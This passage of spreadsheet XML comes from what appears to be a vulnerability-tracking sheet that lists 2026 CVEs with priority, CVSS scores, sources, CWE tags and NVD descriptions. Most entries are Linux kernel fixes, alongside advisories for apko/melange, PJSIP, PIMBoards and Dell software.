reports num_usbpd_ports == num_charger_ports == N for any N &gt; 8 (for
example both 255) passes this check, and the loop then writes N pointers
into the 8-entry ports[] array embedded in the devm_kzalloc()'d
charger_data, overflowing it by up to 255 - 8 = 247 entries (~1976
bytes): a slab out-of-bounds write.
Reject a port count larger than the ports[] array can hold.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89471</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89504</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
regulator: as3722_get_regulator_dt_data: fix premature of_node_put leaving dangling of_node pointer
In as3722_get_regulator_dt_data(), of_get_child_by_name() acquires a
reference on np, which is then assigned to pdev-&gt;dev.of_node. The
function immediately calls of_node_put(np), releasing the reference and
leaving pdev-&gt;dev.of_node as a dangling pointer.
Remove the of_node_put(np) call to let the device hold the reference.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89504</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89560</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Require LANDLOCK_ACCESS_FS_MAKE_REG for whiteout creation
Whiteout objects are used in the upper layer of an OverlayFS to
indicate that the file with this name does not exist in the unified
view, even if it is present in one of the lower layer file systems.
For the userspace implementations of OverlayFS (fuse-overlayfs),
whiteout objects can be created from userspace as well:
* mknod(2) with S_IFCHR and makedev(0, 0)
* renameat2(2) with RENAME_WHITEOUT,
  creating the whiteout in the old place of the moved file.
This commit guards whiteout creation in both of these cases with
LANDLOCK_ACCESS_FS_MAKE_REG.  Whiteout objects are *not* considered
character devices and are not bound to a driver.
LANDLOCK_ACCESS_FS_MAKE_REG describes the same permission class as a
whiteout object: creating one is the only S_IFCHR creation that the VFS
exempts from CAP_MKNOD, so it is as unprivileged as creating a regular
file, while LANDLOCK_ACCESS_FS_MAKE_CHAR and
LANDLOCK_ACCESS_FS_MAKE_BLOCK keep meaning the creation of devices that
expose a kernel interface [1].
For the mknod(2) case, introduce a Landlock erratum.  The creation of
whiteout objects through mknod(2) was previously guarded using
LANDLOCK_ACCESS_FS_MAKE_CHAR, and it is now guarded using
LANDLOCK_ACCESS_FS_MAKE_REG.
For the renameat2(2) case, fix a bug: Before this commit, renameat2(2)
with RENAME_WHITEOUT would create a directory entry even when all
LANDLOCK_ACCESS_FS_MAKE_* rights were denied.
This does not affect normal renames within layered OverlayFS mounts:
When doing a regular rename() on a mounted fuse-overlayfs, it is the
fuse-overlayfs daemon that exercises renameat2() with RENAME_WHITEOUT,
and only the Landlock domain of that daemon is checked there.
Depends-on: 49c9e09d9610 ("landlock: Fix handling of disconnected directories")
Depends-on: fe72ce6710cb ("landlock: Add errata documentation section")
[mic: Record why LANDLOCK_ACCESS_FS_MAKE_REG is the matching right, and
add link(2) to the user doc]</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89560</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89588</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: APEI: GHES: fix ARM section length accounting after header
In ghes_handle_arm_hw_error(), after skipping the cper_sec_proc_arm
header with (err + 1), the remaining length was reduced by sizeof(err)
(pointer size) instead of sizeof(*err) (structure size).
That overestimates the bytes left for cper_arm_err_info records and can
let the parser read past the CPER section when err_info_num is large
enough relative to error_data_length.
Use sizeof(*err) so the length accounting matches the pointer advance
and the earlier sizeof(*err) size check.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89588</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89599</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: omapfb: panel-dsi-cm: initialize lock before registering display
dsicm_probe() registers the display before initializing ddata-&gt;lock.
Once omapdss_register_display() publishes the display, another consumer
can reach a dsicm callback that takes this mutex while it is still
uninitialized.
Initialize the mutex before registering the display so the published
callbacks always see a valid lock.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89599</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89603</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
entry: Fix seccomp bypass after ptrace with TSYNC
Sashiko review pointed out the following issue.
If a thread is stopped in syscall_trace_enter() for ptrace, another
thread can install a seccomp filter with SECCOMP_FILTER_FLAG_TSYNC
(e.g., via seccomp_attach_filter()). This will successfully set
SYSCALL_WORK_SECCOMP on the stopped thread, but syscall_trace_enter()
evaluates a cached 'work' variable sampled on entry. Consequently,
the subsequent check for SYSCALL_WORK_SECCOMP misses the newly
assigned flag, and the filter is silently bypassed.
This race condition could allow an unprivileged process to execute
a prohibited system call (e.g., execve) that the newly installed filter
was intended to block, especially since the tracer might have modified
the system call number during the ptrace stop.
Fix this by re-reading the syscall_work flags after ptrace handling,
so that any new SYSCALL_WORK_SECCOMP flag set by another thread via
TSYNC during the ptrace stop is observed before the subsequent
seccomp check.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89603</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89615</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: bound page_lcns[] index by the log record
The copy_lcns loop and the redo shorten loop index page_lcns[] at j + i,
where i runs up to the log record's lcns_follow. That count is checked only
against the record's own length, not the target entry, so check_dp_table()
(which validates the entry's lcns_follow) does not cover it: the copy_lcns
entry may even be freshly allocated after that check, and find_dp() bounds j
but not i. A crafted record thus overflows page_lcns[] of an otherwise valid
entry.
Add dp_range_ok() and reject, before each loop, any record whose run does
not fit the entry. These are the only two page_lcns[] accesses indexed by
the record rather than the entry, so together with the entry validation
every access is now bounded.
[almaz.alexandrovich@paragon-software.com: original patch contained changes to the problem already handled, applied partly]</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89615</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89744</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
device property: fix infinite loop in fwnode_for_each_child_node()
When iterate over children of a fwnode that has a secondary fwnode,
fwnode_get_next_child_node() can enter an infinite loop if the secondary
fwnode has more than one child.
                       Parent        Child
      (Primary fwnode)   FWa:   {FWa1, FWa2, FWa3}
    (Secondary fwnode)   FWb:   {FWb1, FWb2}
In this case:
 ┌─&gt; fwnode_get_next_child_node(FWa, FWa1)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWa1) returns FWa2
 │
 │   ...
 │
 │   fwnode_get_next_child_node(FWa, FWa3)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWa3) returns NULL
 │    - fwnode_call_ptr_op(FWb, get_next_child_node, FWa3) returns FWb1
 │
 │   fwnode_get_next_child_node(FWa, FWb1)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWb1) returns FWa1
 └────┘
This cause fwnode_for_each_child_node() to loop indefinitely, reapeatedly
output {FWa1, FWa2, FWa3, FWb1, FWa1, ...}.
The root cause is that when the current child (FWb1) belongs to the
secondary fwnode, calling get_next_child_node() on the parimary fwnode
incorrectly returns the first child (FWa1) again instead of NULL.
Fix this by dynamically checking the parent fwnode of the current child
before calling get_next_child_node(). This approach follows the pattern
established in commit b5b41ab6b0c1 ("device property: Check
fwnode-&gt;secondary in fwnode_graph_get_next_endpoint()").</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89744</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54174</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-354</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>melange allows users to build apk packages using declarative pipelines. Apko prior to version 1.2.9, corresponding to melange prior to version 0.50.4, verified the control section hash (`.PKGINFO` etc.) against the signed `APKINDEX`, but never verified the data section hash (the actual package files that get installed). An attacker who could compromise a mirror, poison a cache, or MITM a package fetch could substitute arbitrary file contents while the control hash check still passed. Apko version 1.2.9 and melange version 0.50.4 contain a fix.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54174</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80469</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>psirt@sick.de</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>An attacker may achieve arbitrary code execution on a target system by uploading a malicious device driver package, bypassing driver verification mechanisms, and triggering the execution of
attacker-controlled code. User interaction is required.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80469</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57161</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit acc03b5, a stack buffer overflow exists in PJSUA when processing Service-Route headers in a registration response (update_service_route() in pjsua_acc.c). This affects applications that register using the PJSUA/PJSUA2 account API (the default registration path). The Service-Route URIs from a 2xx response to REGISTER are stored into a fixed-size array without bounding the number of headers; a registrar that returns an excessive number of Service-Route headers can write past the end of the array on the stack. The values written are internal pointers rather than arbitrary data, so the most likely impact is unexpected application termination (denial of service), though memory corruption cannot be excluded. The malicious response may come from a compromised or malicious registrar, or — over unprotected transports — a spoofed response. This issue has been patched via commit acc03b5.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57161</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79645</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R243"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S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79645</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80985</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
